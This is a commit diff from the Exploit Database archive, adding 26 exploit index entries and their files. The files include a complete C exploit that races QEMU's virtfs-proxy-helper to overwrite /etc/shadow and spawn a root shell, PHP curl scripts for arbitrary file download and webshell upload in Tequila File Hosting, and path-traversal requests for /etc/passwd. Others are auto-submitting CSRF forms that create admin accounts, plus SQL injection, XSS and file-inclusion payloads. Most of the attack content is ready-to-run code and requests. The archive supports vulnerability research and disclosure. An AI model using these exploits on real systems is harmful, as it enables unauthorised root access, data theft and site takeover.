DB: 2015-12-18

26 new exploits

files.csv

@@ -35239,6 +35239,7 @@ id,file,description,date,author,platform,type,port
 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80
 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability",2015-12-15,metasploit,jsp,remote,8020
 38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization Vulnerability",2015-12-15,metasploit,java,remote,8080
+38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80
 38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
 38987,platforms/php/webapps/38987.html,"Dredge School Administration System /DSM/loader.php Admin Account Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
@@ -35261,3 +35262,28 @@ id,file,description,date,author,platform,type,port
 39005,platforms/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack-Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0
 39006,platforms/multiple/dos/39006.txt,"Wireshark - getRate Stack-Based Out-of-Bounds Read",2015-12-16,"Google Security Research",multiple,dos,0
 39007,platforms/java/remote/39007.txt,"FireEye Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
+39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
+39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80
+39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0
+39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross Site Request Forgery Vulnerability",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39014,platforms/php/webapps/39014.txt,"EZGenerator Local File Disclosure and Cross Site Request Forgery Vulnerabilities",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection Vulnerability",2014-01-14,"Zhao Liang",php,webapps,0
+39016,platforms/php/webapps/39016.txt,"Joomla! Almond Classifieds Component Arbitrary File Upload Vulnerability",2014-01-10,DevilScreaM,php,webapps,0
+39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80
+39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite Remote Security Vulnerability",2014-01-14,Oracle,multiple,remote,0
+39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
+39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
+39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
+39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
+39023,platforms/android/dos/39023.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-12-17,"Google Security Research",android,dos,0
+39024,platforms/android/dos/39024.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-12-17,"Google Security Research",android,dos,0
+39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
+39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
+39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
+39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Vulnerability",2014-01-16,"High-Tech Bridge",php,webapps,0
+39029,platforms/php/webapps/39029.txt,"bloofoxCMS /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39030,platforms/php/webapps/39030.txt,"bloofoxCMS /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39031,platforms/php/webapps/39031.html,"bloofoxCMS /admin/index.php Admin User Creation CSRF",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39032,platforms/php/webapps/39032.txt,"bloofoxCMS /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0

platforms/android/dos/39023.txt

@@ -0,0 +1,31 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=500
+
+There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.
+
+D/skia    (10905): GIF - Parse error
+D/skia    (10905): --- decoder->decode returned false
+F/libc    (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
+I/DEBUG   ( 2958): pid: 10905, tid: 11276, name: thread-pool-0  >>> com.sec.android.gallery3d <<<
+I/DEBUG   ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
+I/DEBUG   ( 2958):     x0   0000000000000001  x1   0000000089f725ac  x2   0000000000000000  x3   00000000fff9038c
+I/DEBUG   ( 2958):     x4   0000007f9c300000  x5   000000000000001f  x6   0000000000000001  x7   0000007f9c620048
+I/DEBUG   ( 2958):     x8   0000000000000000  x9   0000000000000000  x10  0000000000000080  x11  0000000000003758
+I/DEBUG   ( 2958):     x12  0000000000000020  x13  0000000000000020  x14  00000000000000a5  x15  000000000000001f
+I/DEBUG   ( 2958):     x16  00000000ffffe4e3  x17  00000000000000a5  x18  0000007f9c300000  x19  0000007f9c61fc00
+I/DEBUG   ( 2958):     x20  0000007f9c664080  x21  0000000089e76b2c  x22  000000000000003b  x23  0000000000000001
+I/DEBUG   ( 2958):     x24  0000000000000020  x25  0000000000000020  x26  0000000000000020  x27  0000007f9c664080
+I/DEBUG   ( 2958):     x28  00000000000001da  x29  0000000032e89ae0  x30  0000007faad70e64
+I/DEBUG   ( 2958):     sp   0000007f9cfff170  pc   0000007faad72dbc  pstate 0000000080000000
+I/DEBUG   ( 2958): 
+I/DEBUG   ( 2958): backtrace:
+I/DEBUG   ( 2958):     #00 pc 000000000002ddbc  /system/lib64/libSecMMCodec.so (ColorMap+200)
+I/DEBUG   ( 2958):     #01 pc 000000000002be60  /system/lib64/libSecMMCodec.so (decodeGIF+340)
+I/DEBUG   ( 2958):     #02 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
+I/DEBUG   ( 2958):     #03 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
+
+To reproduce, download the file and open it in Gallery
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip
+

platforms/android/dos/39024.txt

@@ -0,0 +1,33 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=497
+
+Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
+
+I/DEBUG   ( 2961): pid: 12383, tid: 12549, name: thread-pool-1  >>> com.sec.android.gallery3d <<<
+I/DEBUG   ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
+
+I/DEBUG   ( 2961):     x0   0000000089e8117c  x1   00000000000000ff  x2   00000000177fe13c  x3   0000000089e8117c
+I/DEBUG   ( 2961):     x4   0000000000000004  x5   0000007f65f42300  x6   0000000000000002  x7   ffffffffffffffff
+I/DEBUG   ( 2961):     x8   0000000089e83ff0  x9   0000007f65f020b0  x10  000000000000003c  x11  000000000000003b
+I/DEBUG   ( 2961):     x12  0000007f65f02080  x13  00000000ffffffff  x14  0000007f65f02080  x15  00000000000061e0
+I/DEBUG   ( 2961):     x16  0000007f6baccc10  x17  0000007f958f8d80  x18  0000007f9596da40  x19  0000007f65f0e180
+I/DEBUG   ( 2961):     x20  0000007f65f54020  x21  00000000002f0020  x22  0000000000000020  x23  0000000005e00400
+I/DEBUG   ( 2961):     x24  0000000000000004  x25  0000007f65f42300  x26  0000000000000020  x27  0000007f65f52080
+I/DEBUG   ( 2961):     x28  00000000000001da  x29  0000000013071460  x30  0000007f6ba7e40c
+I/DEBUG   ( 2961):     sp   0000007f66796130  pc   0000007f958f8e28  pstate 0000000020000000
+I/DEBUG   ( 2961): 
+I/DEBUG   ( 2961): backtrace:
+I/InjectionManager(12532): Inside getClassLibPath caller 
+I/DEBUG   ( 2961):     #00 pc 0000000000019e28  /system/lib64/libc.so (memset+168)
+I/DEBUG   ( 2961):     #01 pc 0000000000030408  /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
+I/DEBUG   ( 2961):     #02 pc 0000000000033440  /system/lib64/libSecMMCodec.so (DecodeFile+120)
+I/DEBUG   ( 2961):     #03 pc 000000000000c90c  /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
+I/DEBUG   ( 2961):     #04 pc 000000000042ec00  /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
+
+To reproduce, download the file and open it in Gallery.
+
+This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39024.zip
+

platforms/linux/local/39010.c

@@ -0,0 +1,97 @@
+
+/* == virtfshell ==
+ *
+ * Some distributions make virtfs-proxy-helper from QEMU either SUID or
+ * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
+ * virtfs-proxy-helper makes some sort of flimsy check to make sure
+ * its socket path doesn't already exist, it is vulnerable to TOCTOU.
+ *
+ * This should spawn a root shell eventually on vulnerable systems.
+ *
+ * - zx2c4
+ * 2015-12-12
+ *
+ *
+ * zx2c4@thinkpad ~ $ lsb_release -i
+ * Distributor ID: Gentoo
+ * zx2c4@thinkpad ~ $ ./virtfshell 
+ * == Virtfshell - by zx2c4 ==
+ * [+] Trying to win race, attempt 749
+ * [+] Chown'd /etc/shadow, elevating to root
+ * [+] Cleaning up
+ * [+] Spawning root shell
+ * thinkpad zx2c4 # whoami
+ * root
+ *
+ */
+
+#include <stdio.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+
+
+static int it_worked(void)
+{
+	struct stat sbuf = { 0 };
+	stat("/etc/shadow", &sbuf);
+	return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
+}
+
+int main(int argc, char **argv)
+{
+	int fd;
+	pid_t pid;
+	char uid[12], gid[12];
+	size_t attempts = 0;
+
+	sprintf(uid, "%d", getuid());
+	sprintf(gid, "%d", getgid());
+
+	printf("== Virtfshell - by zx2c4 ==\n");
+
+	printf("[+] Beginning race loop\n");
+
+	while (!it_worked()) {
+		printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
+		fd = inotify_init();
+		unlink("/tmp/virtfshell/sock");
+		mkdir("/tmp/virtfshell", 0777);
+		inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
+		pid = fork();
+		if (pid == -1)
+			continue;
+		if (!pid) {
+			close(0);
+			close(1);
+			close(2);
+			execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
+			_exit(1);
+		}
+		read(fd, 0, 0);
+		unlink("/tmp/virtfshell/sock");
+		symlink("/etc/shadow", "/tmp/virtfshell/sock");
+		close(fd);
+		kill(pid, SIGKILL);
+		wait(NULL);
+	}
+
+	printf("[+] Chown'd /etc/shadow, elevating to root\n");
+
+	system(	"cp /etc/shadow /tmp/original_shadow;"
+		"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
+		"cat /tmp/modified_shadow > /etc/shadow;"
+		"su -c '"
+		"	echo [+] Cleaning up;"
+		"	cat /tmp/original_shadow > /etc/shadow;"
+		"	chown root:root /etc/shadow;"
+		"	rm /tmp/modified_shadow /tmp/original_shadow;"
+		"	echo [+] Spawning root shell;"
+		"	exec /bin/bash -i"
+		"'");
+	return 0;
+}

platforms/multiple/remote/39018.txt

@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/64836/info
+
+Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
+
+The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.
+
+Attackers can exploit this issue to obtain sensitive information.
+
+This vulnerability affects the following supported versions:
+12.2.0, 12.2.1, 12.2.2
+
+POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
+Host: target.com:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+
+filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml

platforms/php/webapps/38984.txt

@@ -0,0 +1,132 @@
+================================================================================
+Tequila File Hosting Arbitrary File Download
+================================================================================
+# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
+# Date: 16/12/2015
+# Author: Ashiyane Digital Security Team
+# Version: 1.5
+# Contact: hehsan979@gmail.com
+# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
+================================================================================
+# Description:
+Tequila is a solid, safe, fast, simple and intuitive script which
+allows companies or individuals to upload, manage and share their
+files online. It is studied in every feature and was produced with
+attention to every detail.
+
+# PoC :
+
+# Download Config
+http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php
+
+# Download passwd
+http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd
+
+
+# (PHP Exploit):
+
+	<?php
+	// page : download.php
+	echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
+	echo "Discoverd By Ehsan Hosseini\n\n\n";
+	$ch = curl_init();
+	curl_setopt($ch, CURLOPT_URL,
+"http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
+	curl_setopt($ch, CURLOPT_HTTPGET, 1);
+	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
+5.01; Windows NT 5.0)");
+	$buf = curl_exec ($ch);
+	curl_close($ch);
+	unset($ch);
+	echo $buf;
+	?>
+
+# Vulnerabile code:
+
+	<?php
+	//This script forces the download of the file
+
+	//Retrieving the file name from the querystring
+	//and the stepping stone path to the download folder
+	$fn          = (isset($_GET['filename']) ? $_GET['filename'] : false);
+	$file        = $fn;
+	$sn          = (isset($_GET['name']) ? $_GET['name'] : false);
+	$secure_name = $sn;
+
+	if (strpos($file, "files/") !== false) {
+	    $checkdownload = "true";
+	} else {
+		$checkdownload = "false";
+	}
+
+	//I verify that the file exists
+	if($checkdownload == "true"){
+		if (!file_exists($file)) {
+			//If there is mold an error
+			echo "The file does not exist!";
+		} else {
+			//If the file exists ...
+			//Imposed on the header of the page to force the download of the file
+			header("Cache-Control: public");
+			header("Content-Description: File Transfer");
+			header('Content-Type: application/zip');
+			header("Content-Disposition: attachment; filename= " . $secure_name);
+			header("Content-Transfer-Encoding: binary");
+			header('Connection: Keep-Alive');
+			header('Expires: 0');
+			header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+			header('Pragma: public');
+			//I read the contents of the file
+			readfile($file);
+			exit;
+		}
+	}
+	?>
+
+#######################################################################
+
+================================================================================
+Tequila File Hosting Unrestricted File Upload
+================================================================================
+
+# PoC :
+First register in the site===>
+http://localhost/tequila/register.php
+
+Next using this exploit :
+
+    <?php
+    // page : upload.php
+    $postData = array('folder' => '/username', 'file' => '@shell.php');
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
+    curl_setopt($ch, CURLOPT_POST, 1);
+    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
+    $buf = curl_exec ($ch);
+    curl_close($ch);
+    unset($ch);
+    echo $buf;
+    ?>
+
+or
+
+    curl -i -F folder='/ehsann' -F file=@ehsan.png
+http://localhost/tequila/upload.php
+
+Sheller uploaded.
+
+Path of shell : http://localhost/tequila/files/username/shell.php
+
+#######################################################################
+
+================================================================================
+Tequila File Hosting Coss Site Scripting
+================================================================================
+
+# PoC :
+http://localhost/files.php?folder="><script>alert('Ehsan')</script>
+http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>
+
+================================================================================
+# Discovered By : Ehsan Hosseini (EhsanSec.ir)
+================================================================================

platforms/php/webapps/39011.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64734/info
+
+UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. 
+
+http://www.example.com/products.php?cat_id=4 

platforms/php/webapps/39012.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64734/info
+ 
+UAEPD Shopping Cart Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+ 
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+ 
+http://www.example.com/news.php?id=1

platforms/php/webapps/39013.html

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/64735/info
+
+Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
+
+Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. 
+
+<form method=�POST� name=�form0? action=� http://www.example.com/adminpanel/edit_admin.php�>
+<input type=�hidden� name=�userid� value=�ADMIN�/>
+<input type=�hidden� name=�pass� value=�12121212?/>
+<input type=�hidden� name=�retypepass� value=�12121212?/>
+<input type=�hidden� name=�addnew� value=�1?/>
+<input type=�hidden� name=�action� value=�save�/>
+<input type=�hidden� name=�new� value=�Submit�/>
+</form> 

platforms/php/webapps/39014.txt

@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/64740/info
+
+EZGenerator is prone to a local file-disclosure vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker may leverage these issues to perform unauthorized actions in the context of a logged-in user, or obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 
+
+Local File Disclosure:
+=====================
+www.example.com/utils.php?action=download&filename=file.php%00
+
+CSRF [Add Admin]:
+================
+
+<form method=.POST. name=.form0. action=.
+http://www.example.com/centraladmin.php?process=processuser.>
+<input type=.hidden. name=.flag. value=.add./>
+<input type=.hidden. name=.old_username. value=."/>
+<input type=.hidden. name=.username. value=.admin./>
+<input type=.hidden. name=.name. value=.mm./>
+<input type=.hidden. name=.sirname. value=.hh./>
+<input type=.hidden. name=.email. value=.email@live.com./>
+<input type=.hidden. name=.password. value=.12121212./>
+<input type=.hidden. name=.repeatedpassword. value=.12121212./>
+<input type=.hidden. name=.select_all. value=.yes./>
+<input type=.hidden. name=.access_to_page47. value=.2./>
+<input type=.hidden. name=.save. value=.Save./>
+</form>
+</body>
+</html>
+
+

platforms/php/webapps/39015.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64779/info
+
+Atmail Webmail Server is prone to an HTML-injection vulnerability.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Atmail 7.1.3 is vulnerable; others versions may also be affected. 
+
+ <iframe width=0 height=0 src="javascript:alert('xss in main body')"> 

platforms/php/webapps/39016.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64788/info
+
+The Almond Classifieds Component for Joomla is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+http://127.0.0.1/component/com_aclassfb/photos/ 

platforms/php/webapps/39017.txt

@@ -0,0 +1,51 @@
+Advisory ID: HTB23282
+Product: Zen Cart
+Vendor: Zen Ventures, LLC
+Vulnerable Version(s): 1.5.4
+Tested Version: 1.5.4
+Advisory Publication:  November 25, 2015  [without technical details]
+Vendor Notification: November 25, 2015 
+Vendor Patch: November 26, 2015 
+Public Disclosure: December 16, 2015 
+Vulnerability Type: PHP File Inclusion [CWE-98]
+CVE Reference: CVE-2015-8352
+Risk Level: Critical 
+CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered critical vulnerability in a popular e-commerce software Zen Cart, which can be exploited by remote non-authenticated attackers to compromise vulnerable system. A remote unauthenticated attacker might be able to execute arbitrary PHP code on the target system, run arbitrary system commands, gain complete access to application's database and obtain information of all website users.
+
+The vulnerability exists due to absence of filtration of directory traversal sequences in "act" HTTP GET parameter in "/ajax.php" script, when including local PHP files using 'require()' PHP function. A remote unauthenticated attacker can include and execute arbitrary PHP code on the target system with privileges of the web server. 
+
+A simple exploit below will include file "/tmp/file.php" and execute its content:
+
+http://[host]/ajax.php?method=1&act=/../../../../tmp/file
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Apply vendor's patch.
+
+More Information:
+https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23282 - https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File Inclusion
+[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of e-commerce; free, user-friendly, open source shopping cart software.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/php/webapps/39028.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/64991/info
+
+Sexy polling extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Sexy polling 1.0.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/components/com_sexypolling/vote.php
+POST
+answer_id[]=[SQL Injection] 

platforms/php/webapps/39029.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/65019/info
+
+bloofoxCMS is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. Multiple cross-site request forgery vulnerabilities
+3. A local file-include vulnerability
+
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
+
+bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
+
+http://localhost/bloofox/index.php?login=true
+
+
+POST /bloofox/index.php?login=true HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
+Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/bloofox/index.php?login=true
+Cookie:
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+
+login=Login&password=IPHOBOS&username=\[SQL INJECTION]

platforms/php/webapps/39030.txt

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/65019/info
+ 
+bloofoxCMS is prone to the following security vulnerabilities:
+ 
+1. Multiple SQL-injection vulnerabilities
+2. Multiple cross-site request forgery vulnerabilities
+3. A local file-include vulnerability
+ 
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
+ 
+bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
+
+http://localhost/bloofox/admin/index.php
+
+
+POST /bloofox/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
+Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/bloofox/admin/
+Cookie:
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 41
+
+action=login&password=IPHOBOS&username=\[SQL INJECTION]

platforms/php/webapps/39031.html

@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/65019/info
+  
+bloofoxCMS is prone to the following security vulnerabilities:
+  
+1. Multiple SQL-injection vulnerabilities
+2. Multiple cross-site request forgery vulnerabilities
+3. A local file-include vulnerability
+  
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
+  
+bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://localhost/admin/index.php?mode=user&action=new">
+<input type="hidden" name="username" value="Admin"/>
+<input type="hidden" name="password" value="123456"/>
+<input type="hidden" name="pwdconfirm" value="123456"/>
+<input type="hidden" name="3" value="Admin"/>
+<input type="hidden" name="blocked" value="0"/>
+<input type="hidden" name="deleted" value="0"/>
+<input type="hidden" name="status" value="1"/>
+<input type="hidden" name="login_page" value="0"/>
+<input type="hidden" name="send" value="Add User"/>
+</form>
+</body>
+</html>

platforms/php/webapps/39032.txt

@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/65019/info
+   
+bloofoxCMS is prone to the following security vulnerabilities:
+   
+1. Multiple SQL-injection vulnerabilities
+2. Multiple cross-site request forgery vulnerabilities
+3. A local file-include vulnerability
+   
+Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
+   
+bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.
+ 
+VULNERABILITY
+##############
+/admin/include/inc_settings_editor.php (line 56-69)
+
+// show file
+if(isset($_POST["fileurl"])) {
+    $fileurl = $_POST["fileurl"];
+}
+if(isset($_GET["fileurl"])) {
+    $fileurl = "../".$_GET["fileurl"];
+}
+
+if(file_exists($fileurl)) {
+    $filelength = filesize($fileurl);
+    $readfile = fopen($fileurl,"r");
+    $file = fread($readfile,$filelength);
+    fclose($readfile);
+}
+
+
+
+#########
+EXPLOIT
+#########
+
+http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php

platforms/win32/dos/39026.txt

@@ -0,0 +1,11 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=534
+
+The attached PoC triggers a null pointer condition on Windows 7 32-bit, which can potentially be exploited on versions of Windows that allow mapping the null page (e.g. Windows 7 32-bit).
+---
+
+Note that multiple PoC executions and simulated system activity (such as opening Explorer) may be required to trigger this issue.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39026.zip
+

platforms/win32/dos/39027.txt

@@ -0,0 +1,11 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=533
+
+This PoC triggers a crash on Windows 7 32-bit with Special Pool enabled on win32k.sys. The kernel crashes due to a use-after-free condition with bitmaps in the clipboard.
+---
+
